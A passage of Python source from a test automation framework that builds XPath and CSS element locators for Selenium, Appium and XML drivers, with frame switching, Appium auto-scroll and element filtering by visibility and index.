1)\n return tmp_results[index_number]\n\n except:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef Append(object, value, mid):\n try:\n idx = max(int(mid)-1, 0)\n except:\n idx = 0\n for i in range(len(object), idx + 1):\n object.append([])\n object[idx].append(value)\n return object\n\n\ndef Index(elem_list:list)->str:\n for left, mid, right in elem_list:\n if left.strip().lower() == \"index\":\n try:\n num = int(right.strip())\n if num >= 0:\n return str(num+1) # Converting 0 based idx to 1 based idx\n else:\n if num == -1: return \"last()\" # -1 to last()\n else: return f\"last(){str(num+1)}\" # -2 to last()-1\n except: return right.strip() # returning the string as is. such as 'last()'\n\n return \"last()\" # default is last()\n\n\n\ndef _construct_query(step_data_set, web_element_object=False):\n \"\"\"\n first find out if in our dataset user is using css or xpath. If they are using css or xpath, they cannot use any \n other feature such as child parameter or multiple element parameter to locate the element.\n If web_element_object = True then it will generate a xpath so that find_elements can find only the child elements\n inside the given parent element\n \"\"\"\n try:\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n collect_all_attribute = [x[0] for x in step_data_set]\n\n child_parameter_list = []\n element_parameter_list = []\n parent_parameter_list = []\n unique_parameter_list = []\n sibling_parameter_list = []\n following_parameter_list = []\n preceding_parameter_list = []\n\n for left, mid, right in step_data_set:\n mid_ = mid.replace(\" \", \"\").lower()\n if \"elementparameter\" == mid_: element_parameter_list.append((left, mid, right))\n elif \"uniqueparameter\" == mid_: unique_parameter_list.append((left, mid, right))\n elif \"parent\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"parent\", \"\").replace(\"parameter\", \"\")\n parent_parameter_list = Append(parent_parameter_list, (left, mid, right), mid_)\n elif \"sibling\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"sibling\", \"\").replace(\"parameter\", \"\")\n sibling_parameter_list = Append(sibling_parameter_list, (left, mid, right), mid_)\n elif \"child\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"child\", \"\").replace(\"parameter\", \"\")\n child_parameter_list = Append(child_parameter_list, (left, mid, right), mid_)\n elif \"preceding\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"preceding\", \"\").replace(\"parameter\", \"\")\n preceding_parameter_list = Append(preceding_parameter_list, (left, mid, right), mid_)\n elif \"following\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"following\", \"\").replace(\"parameter\", \"\")\n following_parameter_list = Append(following_parameter_list, (left, mid, right), mid_)\n\n child_ref_exits = len(child_parameter_list) > 0\n parent_ref_exits = len(parent_parameter_list) > 0\n sibling_ref_exits = len(sibling_parameter_list) > 0\n unique_ref_exists = len(unique_parameter_list) > 0\n\n if (\n unique_ref_exists\n and driver_type in (\"appium\", \"selenium\")\n ): # for unique identifier\n return [unique_parameter_list[0][0], unique_parameter_list[0][2]], \"unique\"\n elif \"css\" in collect_all_attribute and \"xpath\" not in collect_all_attribute:\n # return the raw css command with css as type. We do this so that even if user enters other data, we will ignore them.\n # here we expect to get raw css query\n return ([x for x in step_data_set if \"css\" in x[0]][0][2]), \"css\"\n elif \"xpath\" in collect_all_attribute and \"css\" not in collect_all_attribute:\n # return the raw xpath command with xpath as type. We do this so that even if user enters other data, we will ignore them.\n # here we expect to get raw xpath query\n return ([x for x in step_data_set if \"xpath\" in x[0]][0][2]), \"xpath\"\n elif (\n not child_ref_exits\n and parent_ref_exits\n and not sibling_ref_exits\n and driver_type == \"xml\"\n ):\n \"\"\" If There is parent but making sure no child\"\"\"\n xpath_parent_list = _construct_xpath_list(parent_parameter_list)\n parent_xpath_string = _construct_xpath_string_from_list(xpath_parent_list)\n # For xml we just put parent first and element later\n xpath_element_list = _construct_xpath_list(element_parameter_list, True)\n element_xpath_string = _construct_xpath_string_from_list(xpath_element_list)\n xpath_element_list_combined = parent_xpath_string + element_xpath_string\n return _construct_xpath_string_from_list(xpath_element_list_combined), \"xpath\"\n\n elif child_ref_exits and driver_type == \"xml\":\n \"\"\"Currently we do not support child as reference for xml\"\"\"\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Currently we do not support child as reference for xml. Please contact info@automationsolutionz.com for help\",\n 3,\n )\n return False, False\n elif (\n not child_ref_exits\n and not parent_ref_exits\n and not sibling_ref_exits\n and not web_element_object\n ):\n \"\"\" If there are no child or parent as reference, then we construct the xpath differently\"\"\"\n # first we collect all rows with element parameter only\n xpath_element_list = _construct_xpath_list(element_parameter_list)\n return _construct_xpath_string_from_list(xpath_element_list), \"xpath\"\n elif web_element_object and driver_type in (\"appium\", \"selenium\"):\n \"\"\"\n 'descendant::<target element tag>[<target element attribute>]'\n \"\"\"\n xpath_element_list = _construct_xpath_list(element_parameter_list)\n element_xpath_string = _construct_xpath_string_from_list(xpath_element_list)\n element_xpath_string = element_xpath_string.replace(\"//\", \"\")\n\n full_query = \"descendant::\" + element_xpath_string\n return full_query, \"xpath\"\n\n\n '''^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'''\n '''^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'''\n\n \"\"\" //Pre_Element//following::Element[descendant::Child_1][descendant::Child_2][following::Following_Element] \"\"\"\n\n Precedings = \"\"\n for preciding_param in reversed(preceding_parameter_list):\n Precedings += f\"{_construct_xpath_string_from_list(_construct_xpath_list(preciding_param))[2:]}//following::\"\n\n Element = _construct_xpath_string_from_list(_construct_xpath_list(element_parameter_list))[2:]\n\n Child = \"\"\n for child_param in child_parameter_list:\n Child += f\"[descendant::{_construct_xpath_string_from_list(_construct_xpath_list(child_param))[2:]}]\"\n\n Followings = \"\"\n for following_param in reversed(following_parameter_list):\n Followings = f\"[following::{_construct_xpath_string_from_list(_construct_xpath_list(following_param))[2:]}{Followings}]\"\n\n Element = f\"{Element}{Child}{Followings}\"\n\n # if sibling_ref_exits and not parent_ref_exits:\n # CommonUtil.ExecLog(sModuleInfo, \"In order to use sibling reference you need to provide a common parent that contains both Element and Sibling\", 3)\n # return False, False\n if sibling_ref_exits:\n \"\"\"\n (//Sibling_1/ancestor::Parent [descendant::Element] [ (ancestor::GrandParent_1)[last()] ][ (ancestor::GrandParent_2)[last()] ][ (descendant::Sibling_2 )[last()]][ (descendant::Sibling_3)[last()] ])[last()]//Element[descendant::Child_1][descendant::Child_2]\n \"\"\"\n Sibling = _construct_xpath_string_from_list(_construct_xpath_list(sibling_parameter_list[0]))[2:]\n Other_Siblings = \"\"\n for sibling_param in sibling_parameter_list[1:]:\n Other_Sibling = _construct_xpath_string_from_list(_construct_xpath_list(sibling_param))[2:]\n Other_Siblings += f\"[descendant::{Other_Sibling}]\"\n\n if parent_ref_exits:\n Parent = _construct_xpath_string_from_list(_construct_xpath_list(parent_parameter_list[0]))[2:]\n else:\n Parent = \"*\"\n GrandParents = \"\"\n for parent_param in reversed(parent_parameter_list[1:]):\n GrandParent = _construct_xpath_string_from_list(_construct_xpath_list(parent_param))[2:]\n idx = Index(parent_param)\n GrandParents = f\"[(ancestor::{GrandParent}{GrandParents})[{idx}]]\"\n\n idx = Index(parent_parameter_list[0]) if parent_ref_exits else \"last()\"\n full_query = f\"(//{Precedings}{Sibling}/ancestor::{Parent}[descendant::{Element}]{GrandParents}{Other_Siblings})[{idx}]//{Element}\"\n return full_query, \"xpath\"\n\n elif not sibling_ref_exits:\n \"\"\"\n (//Sibling_1/ancestor::Parent [ (ancestor::GrandParent_1 [(ancestor::GrandParent_2)[last()]] )[last()] ][ (descendant::Sibling_2 )[last()]][ (descendant::Sibling_3)[last()] ])[last()]//Element[descendant::Child_1][descendant::Child_2] \n \"\"\"\n Parents = \"\"\n for parent_param in reversed(parent_parameter_list):\n Parent = _construct_xpath_string_from_list(_construct_xpath_list(parent_param))[2:]\n idx = Index(parent_param)\n Parents += f\"[(ancestor::{Parent}{Parents})[{idx}]]\"\n full_query = f\"//{Precedings}{Element}{Parents}\"\n return full_query, \"xpath\"\n\n CommonUtil.ExecLog(\n sModuleInfo,\n \"You have entered an unsupported data set. Please contact info@automationsolutionz.com for help\",\n 3,\n )\n return False, False\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef _driver_type(query_debug):\n \"\"\"\n This function will find out what type of driver it is. Query changes slightly for certain cases based on appium, selenium and xml.\n \"\"\"\n driver_type = None\n # check if its Appium, selenium or XML\n try:\n driver_string = str(generic_driver)\n print(driver_string)\n if query_debug == True:\n return \"debug\"\n elif \"selenium\" in driver_string or \"browser\" in driver_string:\n driver_type = \"selenium\"\n elif \"appium\" in driver_string:\n driver_type = \"appium\"\n elif \"Element\" in driver_string:\n driver_type = \"xml\"\n elif \"pyautogui\" in driver_string:\n driver_type = \"pyautogui\"\n else:\n driver_type = None\n return driver_type\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef _construct_xpath_list(parameter_list, add_dot=False):\n \"\"\"\n This function constructs the raw data from step data into a xpath friendly format but in a list\n \"\"\"\n try:\n # Setting the list empty\n element_main_body_list = []\n # these are special cases where we cannot treat their attribute as any other attribute such as id, class and so on...\n excluded_attribute = [\n \"**text\", \"*text\", \"text\",\n \"tag\",\n \"css\",\n \"index\",\n \"xpath\",\n \"switch frame\",\n \"switch window\",\n \"switch alert\",\n \"switch active\",\n ]\n for each_data_row in parameter_list:\n attribute = each_data_row[0].strip()\n attribute_value = each_data_row[2]\n quote = \"'\" if '\"' in attribute_value else '\"'\n\n if attribute == \"text\" and driver_type in (\"selenium\", \"xml\"): # exact search\n text_value = f'[text()={quote}{attribute_value}{quote}]'\n element_main_body_list.append(text_value)\n elif attribute == \"*text\" and driver_type in (\"selenium\", \"xml\"): # partial search\n text_value = f'[contains(text(),{quote}{attribute_value}{quote})]'\n element_main_body_list.append(text_value)\n elif attribute == \"**text\" and driver_type in (\"selenium\", \"xml\"): # partial search + ignore case\n text_value = f'[contains(translate(text(),\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\",\"abcdefghijklmnopqrstuvwxyz\"),{quote}{attribute_value.lower()}{quote})]'\n element_main_body_list.append(text_value)\n\n elif attribute == \"text\" and driver_type == \"appium\": # exact search\n current_context = generic_driver.context\n if \"WEB\" in current_context:\n text_value = f'[text()={quote}{attribute_value}{quote}]'\n else:\n text_value = f'[@text={quote}{attribute_value}{quote}]'\n element_main_body_list.append(text_value)\n elif attribute == \"**text\" and driver_type == \"appium\": # partial search + ignore case\n text_value = f\"[contains(translate(@text,'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),{quote}{attribute_value.lower()}{quote})]\"\n current_context = generic_driver.context\n element_main_body_list.append(text_value)\n elif attribute == \"*text\" and driver_type == \"appium\": # partial search\n current_context = generic_driver.context\n if \"WEB\" in current_context:\n text_value = f'[contains({attribute.split(\"*\")[1]}(),{quote}{attribute_value}{quote})]'\n else:\n text_value = f'[contains(@{attribute.split(\"*\")[1]},{quote}{attribute_value}{quote})]'\n element_main_body_list.append(text_value)\n\n elif attribute not in excluded_attribute and \"*\" not in attribute: # exact search\n other_value = f'[@{attribute}={quote}{attribute_value}{quote}]'\n element_main_body_list.append(other_value)\n elif attribute not in excluded_attribute and \"**\" in attribute: # partial search + ignore case\n if driver_type == \"appium\":\n other_value = f\"[contains(translate(@{attribute.split('**')[1]},'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),{quote}{attribute_value.lower()}{quote})]\"\n else:\n other_value = f\"[contains(translate(@{attribute.split('**')[1]},'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),{quote}{attribute_value.lower()}{quote})]\"\n element_main_body_list.append(other_value)\n elif attribute not in excluded_attribute and \"*\" in attribute: # partial search\n if driver_type == \"appium\":\n other_value = f'[contains(@{attribute.split(\"*\")[1]},{quote}{attribute_value}{quote})]'\n else:\n other_value = f'[contains(@{attribute.split(\"*\")[1]},{quote}{attribute_value}{quote})]'\n element_main_body_list.append(other_value)\n\n # we do the tag on its own\n # tag_was_given = any(\"tag\" in s for s in parameter_list)\n if \"tag\" in [x[0] for x in parameter_list]:\n tag_item = \"//\" + [x for x in parameter_list if \"tag\" in x][0][2]\n else:\n tag_item = \"//*\"\n if add_dot != False and driver_type != \"xml\":\n tag_item = \".\" + tag_item\n element_main_body_list.append(tag_item)\n # We need to reverse the list so that tag comes at the begining\n return list(reversed(element_main_body_list))\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef _construct_xpath_string_from_list(xpath_list):\n \"\"\"\n in this function, we simply take the list and construct the actual query in string\n \"\"\"\n try:\n xpath_string_format = \"\"\n for each in xpath_list:\n xpath_string_format = xpath_string_format + each\n return xpath_string_format\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef _switch(step_data_set):\n \"here we switch the global driver to any of the switch call\"\n try:\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n # find if frame switch is there. If user enters more than one frame, it will ignore\n # user should enter multiple frame in this order parent > child > grand child ... and so on\n if \"switch frame\" in [x[0] for x in step_data_set]:\n generic_driver.switch_to.default_content()\n CommonUtil.ExecLog(\n sModuleInfo,\n \"This method of 'switch frame' is deprecated and will be removed at a later period.\\n\" +\n \"Please use our new action 'Switch iframe' to get updated features\",\n 2)\n frame_switch = [x for x in step_data_set if \"switch frame\" == x[0]][0][2]\n # first we split by > and then we reconstruct the list by striping trailing spaces\n frame_switch_list = [(x.strip()) for x in (frame_switch.split(\">\"))]\n # we switch each frame in order\n for each_frame in frame_switch_list:\n CommonUtil.ExecLog(sModuleInfo, \"switching frame; %s\" % each_frame, 1)\n # switch by index. If index of iframe is provided, then we need to convert to int\n check_if_index = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\"]\n if each_frame in check_if_index:\n each_frame = int(each_frame)\n if isinstance(each_frame, str) and each_frame.strip().lower() == \"default content\":\n continue\n else:\n generic_driver.switch_to.frame(each_frame)\n\n return True\n \"\"\"\n # We are moving this as a dedicated action so that we do not need to keep switching windows for every action.\n # however, users will now need to perform switch to the main window when they are done with their actions for pop up window \n elif \"switch window\" in [x[0] for x in step_data_set]: \n #get the value of switch window\n window_switch = [x for x in step_data_set if 'switch window' == x[0]] [0][2]\n all_windows = generic_driver.window_handles\n window_handles_found = False\n for each in all_windows:\n generic_driver.switch_to.window(each)\n if window_switch in (generic_driver.title):\n window_handles_found = True\n CommonUtil.ExecLog(sModuleInfo, \"switched your window\", 1)\n break\n if window_handles_found == False:\n CommonUtil.ExecLog(sModuleInfo, \"unable to switch your window\", 3)\n return False\n else:\n return True\n \"\"\"\n\n elif \"switch alert\" in [x[0] for x in step_data_set]:\n generic_driver.switch_to_alert()\n CommonUtil.ExecLog(sModuleInfo, \"switching to alert\", 1)\n return True\n elif \"switch active\" in [x[0] for x in step_data_set]:\n CommonUtil.ExecLog(sModuleInfo, \"switching to active element\", 1)\n generic_driver.switch_to_active_element()\n return True\n else:\n return True\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef auto_scroll_appium(data_set, element_query):\n \"\"\"\n To auto scroll to an element which is scrollable, won't work if no scrollable element is present\n \"\"\"\n global generic_driver\n all_matching_elements_visible_invisible = []\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n scrollable_element = generic_driver.find_elements_by_android_uiautomator(\"new UiSelector().scrollable(true)\")\n auto_scroll = False\n inset = 0.1\n position = 0.5\n for left, mid, right in data_set:\n left = left.strip().lower()\n mid = mid.strip().lower()\n right = right.replace(\"%\", \"\").replace(\" \", \"\").lower()\n if \"scroll parameter\" in mid and left == \"auto scroll\" and right in (\"yes\", \"ok\", \"enable\", \"true\"):\n auto_scroll = True\n if auto_scroll == False :\n return []\n\n if len(scrollable_element) == 0:\n return []\n elif len(scrollable_element) > 1:\n CommonUtil.ExecLog(sModuleInfo, 'Multiple scrollable page found. So Auto scroll will not respond. Please use \"Scroll to an element\" action if you need scroll to find that element', 2)\n return []\n\n height = scrollable_element[0].size[\"height\"]\n width = scrollable_element[0].size[\"width\"]\n xstart_location = scrollable_element[0].location[\"x\"] # Starting location of the x-coordinate of scrollable element\n ystart_location = scrollable_element[0].location[\"y\"] # Starting location of the y-coordinate of scrollable element\n max_try = 10\n direction = \"up\" if height > width else \"left\"\n swipe_speed = None\n\n try:\n for left, mid, right in data_set:\n left = left.strip().lower()\n mid = mid.strip().lower()\n right = right.replace(\"%\", \"\").replace(\" \", \"\").lower()\n if \"scroll parameter\" in mid:\n if left == \"direction\" and right in (\"up\", \"down\", \"left\", \"right\"):\n direction = right\n elif left == \"swipe speed\":\n swipe_speed = float(right) / 1000.00\n elif left == \"inset\":\n inset = float(right) / 100.0\n elif left == \"position\":\n position = float(right) / 100.0\n elif left == \"max try\":\n max_try = float(right)\n except:\n CommonUtil.Exception_Handler(sys.exc_info(), None, \"Unable to parse data. Please write data in correct format\")\n return []\n\n if direction == \"up\":\n tmp = 1.0 - inset\n new_height = round(tmp * height)\n new_width = round(position * width)\n x1 = xstart_location + new_width\n x2 = x1\n y1 = ystart_location + new_height - 1\n y2 = ystart_location\n if swipe_speed is None:\n duration = new_height * 0.0032\n else:\n duration = new_height * swipe_speed\n elif direction == \"down\":\n tmp = 1.0 - inset\n new_height = round(tmp * height)\n new_width = round(position * width)\n x1 = xstart_location + new_width\n x2 = x1\n y1 = ystart_location + 1\n y2 = ystart_location + new_height\n if swipe_speed is None:\n duration = new_height * 0.0032\n else:\n duration = new_height * swipe_speed\n elif direction == \"left\":\n tmp = 1.0 - inset\n new_width = round(tmp * width)\n new_height = round(position * height)\n x1 = xstart_location + new_width - 1\n x2 = xstart_location\n y1 = ystart_location + new_height\n y2 = y1\n if swipe_speed is None:\n duration = new_width * 0.0032\n else:\n duration = new_width * swipe_speed\n\n elif direction == \"right\":\n tmp = 1.0 - inset\n new_width = round(tmp * width)\n new_height = round(position * height)\n x1 = xstart_location + 1\n x2 = xstart_location + new_width\n y1 = ystart_location + new_height\n y2 = y1\n if swipe_speed is None:\n duration = new_width * 0.0032\n else:\n duration = new_width * swipe_speed\n else:\n CommonUtil.ExecLog(sModuleInfo, \"Direction should be among up, down, right or left\", 3)\n return []\n\n try:\n CommonUtil.ExecLog(sModuleInfo, \"Auto scrolling with the following scroll parameter:\\n\" +\n \"Max_try: %s, Direction: %s, Duration of a swipe: %s second, Inset: %s, Position:%s\\n\" % (max_try, direction, duration, inset*100, position*100) +\n \"Calculated Coordinate: (%s,%s) to (%s,%s)\" % (x1, y1, x2, y2), 1)\n i = 0\n while i < max_try:\n # We will try to match the outerHTML of the scrollable element to determine the end of the scroll.\n page_src = tostring(fromstring(generic_driver.page_source).findall('.//*[@scrollable=\"true\"]')[0]).decode()\n generic_driver.swipe(x1, y1, x2, y2, duration * 1000) # duration seconds to milliseconds\n all_matching_elements_visible_invisible = generic_driver.find_elements(By.XPATH, element_query)\n if page_src == tostring(fromstring(generic_driver.page_source).findall('.//*[@scrollable=\"true\"]')[0]).decode() or len(all_matching_elements_visible_invisible) != 0:\n return all_matching_elements_visible_invisible\n i += 1\n return all_matching_elements_visible_invisible\n\n except Exception:\n CommonUtil.Exception_Handler(sys.exc_info(), None, \"Error could not auto scroll\")\n return []\n\n\ndef _get_xpath_or_css_element(element_query, css_xpath,data_set, index_number=None, Filter=\"\", return_all_elements=False, element_wait=None):\n \"\"\"\n Here, we actually execute the query based on css/xpath and then analyze if there are multiple.\n If we find multiple we give warning and send the first one we found.\n We also consider if user sent index. If they did, we send them the index they provided\n If return_all_elements = True then we return all elements.\n \"\"\"\n global generic_driver\n try:\n all_matching_elements_visible_invisible = False\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n\n exception_cnd = False\n if element_wait is None:\n element_wait = int(sr.Get_Shared_Variables(\"element_wait\"))\n end = time.time() + element_wait\n\n while True:\n if css_xpath == \"unique\" and (driver_type == \"appium\" or driver_type == \"selenium\"): # for unique id\n try:\n unique_key = element_query[0]\n unique_value = element_query[1]\n if driver_type == \"appium\" and (\n unique_key == \"accessibility id\"\n or unique_key == \"accessibility-id\"\n or unique_key == \"content-desc\"\n or unique_key == \"content desc\"\n ): # content-desc for android, accessibility id for iOS\n unique_element = generic_driver.find_element_by_accessibility_id(unique_value)\n elif unique_key == \"id\" or (driver_type == \"appium\" and (unique_key == \"resource id\" or unique_key == \"resource-id\" or unique_key == \"name\")): # name for iOS\n unique_element = generic_driver.find_element(By.ID, unique_value)\n elif unique_key == \"name\":\n unique_element = generic_driver.find_element(By.NAME, unique_value)\n elif unique_key == \"class\":\n unique_element = generic_driver.find_element(By.CLASS_NAME, unique_value)\n elif unique_key == \"tag\":\n unique_element = generic_driver.find_element(By.TAG_NAME, unique_value)\n elif unique_key == \"css\":\n unique_element = generic_driver.find_element(By.CSS_SELECTOR, unique_value)\n elif unique_key == \"xpath\":\n unique_element = generic_driver.find_element(By.XPATH, unique_value)\n elif unique_key in [\"text\", \"*text\"]:\n if driver_type == \"appium\":\n if unique_key == \"text\":\n unique_element = generic_driver.find_element(By.XPATH, '//*[@text=\"%s\"]' % unique_value)\n else:\n unique_element = generic_driver.find_element(By.XPATH, '//*[contains(@text,\"%s\")]' % unique_value)\n else:\n if unique_key == \"text\":\n unique_element = generic_driver.find_element(By.XPATH, '//*[text()=\"%s\"]' % unique_value)\n else:\n unique_element = generic_driver.find_element(By.XPATH, '//*[contains(text(),\"%s\")]' % unique_value)\n else:\n if \"*\" in unique_key:\n unique_key = unique_key[1:] # drop the asterisk\n unique_element = generic_driver.find_element(By.XPATH, \"//*[contains(@%s,'%s')]\" % (unique_key, unique_value))\n else:\n unique_element = generic_driver.find_element(By.XPATH, \"//*[@%s='%s']\" % (unique_key, unique_value))\n return unique_element\n except Exception as e:\n exception_cnd = True\n continue\n elif css_xpath == \"xpath\" and driver_type != \"xml\":\n all_matching_elements_visible_invisible = generic_driver.find_elements(By.XPATH, element_query)\n elif css_xpath == \"xpath\" and driver_type == \"xml\":\n all_matching_elements_visible_invisible = generic_driver.xpath(element_query)\n elif css_xpath == \"css\":\n all_matching_elements_visible_invisible = generic_driver.find_elements(By.CSS_SELECTOR, element_query)\n\n if all_matching_elements_visible_invisible and len(filter_elements(all_matching_elements_visible_invisible, \"\")) > 0:\n break\n if time.time() > end:\n break\n # end of while loop\n\n if exception_cnd:\n return \"zeuz_failed\"\n\n if driver_type == \"appium\" and index_number is not None and index_number > 0 and len(all_matching_elements_visible_invisible) == 0:\n CommonUtil.ExecLog(sModuleInfo, \"Element not found and we do not support Auto Scroll when index is provided\", 2)\n elif driver_type == \"appium\" and len(all_matching_elements_visible_invisible) == 0:\n all_matching_elements_visible_invisible = auto_scroll_appium(data_set, element_query)\n \n all_matching_elements = filter_elements(all_matching_elements_visible_invisible, Filter)\n if Filter == \"allow hidden\":\n displayed_len = len(filter_elements(all_matching_elements_visible_invisible, \"\"))\n hidden_len = len(all_matching_elements_visible_invisible) - displayed_len\n else:\n displayed_len = len(all_matching_elements)\n hidden_len = len(all_matching_elements_visible_invisible) - displayed_len\n\n if return_all_elements:\n if Filter == \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning all of them\"\n % (hidden_len, displayed_len),\n 1\n )\n else:\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning %s displayed elements only\"\n % (hidden_len, displayed_len, displayed_len),\n 1\n )\n return all_matching_elements\n elif len(all_matching_elements) == 0:\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and no displayed elements. Nothing to return.\\n\" % hidden_len +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\")\",\n 3\n )\n return \"zeuz_failed\"\n elif len(all_matching_elements) == 1 and index_number is None:\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the displayed element only\\n\" % (hidden_len, displayed_len) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\") and also consider providing index\",\n 2\n )\n elif Filter == \"allow hidden\":\n CommonUtil.ExecLog(\"\", \"Found %s hidden element and %s displayed element\" % (hidden_len, displayed_len), 1)\n return all_matching_elements[0]\n elif len(all_matching_elements) > 1 and index_number is None:\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the first displayed element only\\n\" % (hidden_len, displayed_len) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\") and also consider providing index\",\n 2\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s displayed elements. Returning the first displayed element only. Consider providing index\" % displayed_len,\n 2\n )\n else:\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the first element only. Consider providing index\" % (hidden_len, displayed_len),\n 2\n )\n return all_matching_elements[0]\n elif len(all_matching_elements) == 1 and index_number not in (-1, 0):\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Found %s hidden elements and %s displayed elements but you provided a wrong index number. Returning the only displayed element\\n\" % (hidden_len, displayed_len) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\") and also consider providing correct index\",\n 2,\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Found 0 hidden elements and %s displayed elements but you provided a wrong index number. Returning the only displayed element\\n\" % displayed_len,\n 2,\n )\n elif Filter == \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden element and %s displayed element but you provided a wrong index number. Returning the only element\" % (hidden_len, displayed_len),\n 2\n )\n return all_matching_elements[0]\n elif len(all_matching_elements) == 1 and index_number in (-1, 0):\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the displayed element of index %s\\n\" % (hidden_len, displayed_len, index_number) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\")\",\n 1\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found 0 hidden elements and %s displayed elements. Returning the displayed element of index %s\" % (displayed_len, index_number),\n 1\n )\n elif Filter == \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the element of index %s\" % (hidden_len, displayed_len, index_number),\n 1\n )\n return all_matching_elements[0]\n elif len(all_matching_elements) > 1 and index_number is not None:\n # if (len(all_matching_elements) - 1) < abs(index_number):\n if -len(all_matching_elements) <= index_number < len(all_matching_elements):\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the displayed element of index %s\\n\" % (hidden_len, displayed_len, index_number) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\")\",\n 1\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found 0 hidden elements and %s displayed elements. Returning the displayed element of index %s\" % (displayed_len, index_number),\n 1\n )\n else:\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the element of index %s\" % (hidden_len, displayed_len, index_number),\n 1\n )\n return all_matching_elements[index_number]\n else:\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Index exceeds the number of displayed elements found\\n\" % (hidden_len, displayed_len) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\") and also consider providing correct index\",\n 3\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found 0 hidden elements and %s displayed elements. Index exceeds the number of displayed elements found\" % displayed_len,\n 3\n )\n else:\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Index exceeds the number of elements found\" % (hidden_len, displayed_len),\n 3\n )\n return \"zeuz_failed\"\n else:\n return \"zeuz_failed\"\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n # Don't want to show error messages from here, especially for wait_for_element()\n # CommonUtil.ExecLog(sModuleInfo, \"Exception caught - %s\" % str(sys.exc_info()), 0)\n # return \"zeuz_failed\"\n\n\ndef filter_elements(all_matching_elements_visible_invisible, Filter):\n # visible, enable\n all_matching_elements = []\n try:\n if Filter != \"allow hidden\":\n for each in all_matching_elements_visible_invisible:\n try:\n if each.is_displayed():\n all_matching_elements.append(each)\n except:\n pass\n return all_matching_elements\n else:\n return all_matching_elements_visible_invisible\n except:\n all_matching_elements = []\n return all_matching_elements\n\n\ndef _locate_index_number(step_data_set):\n \"\"\"\n Check if index exists, if it does, get the index value.\n if we cannot convert index to integer, set it to None\n \"\"\"\n try:\n for left, mid, right in step_data_set:\n l = left.strip().lower()\n m = mid.strip().lower()\n if l == \"index\" and m == \"element parameter\":\n return int(right.strip())\n return None\n except Exception:\n CommonUtil.Exception_Handler(sys.exc_info(), None, \"Index = 0 is set\")\n return 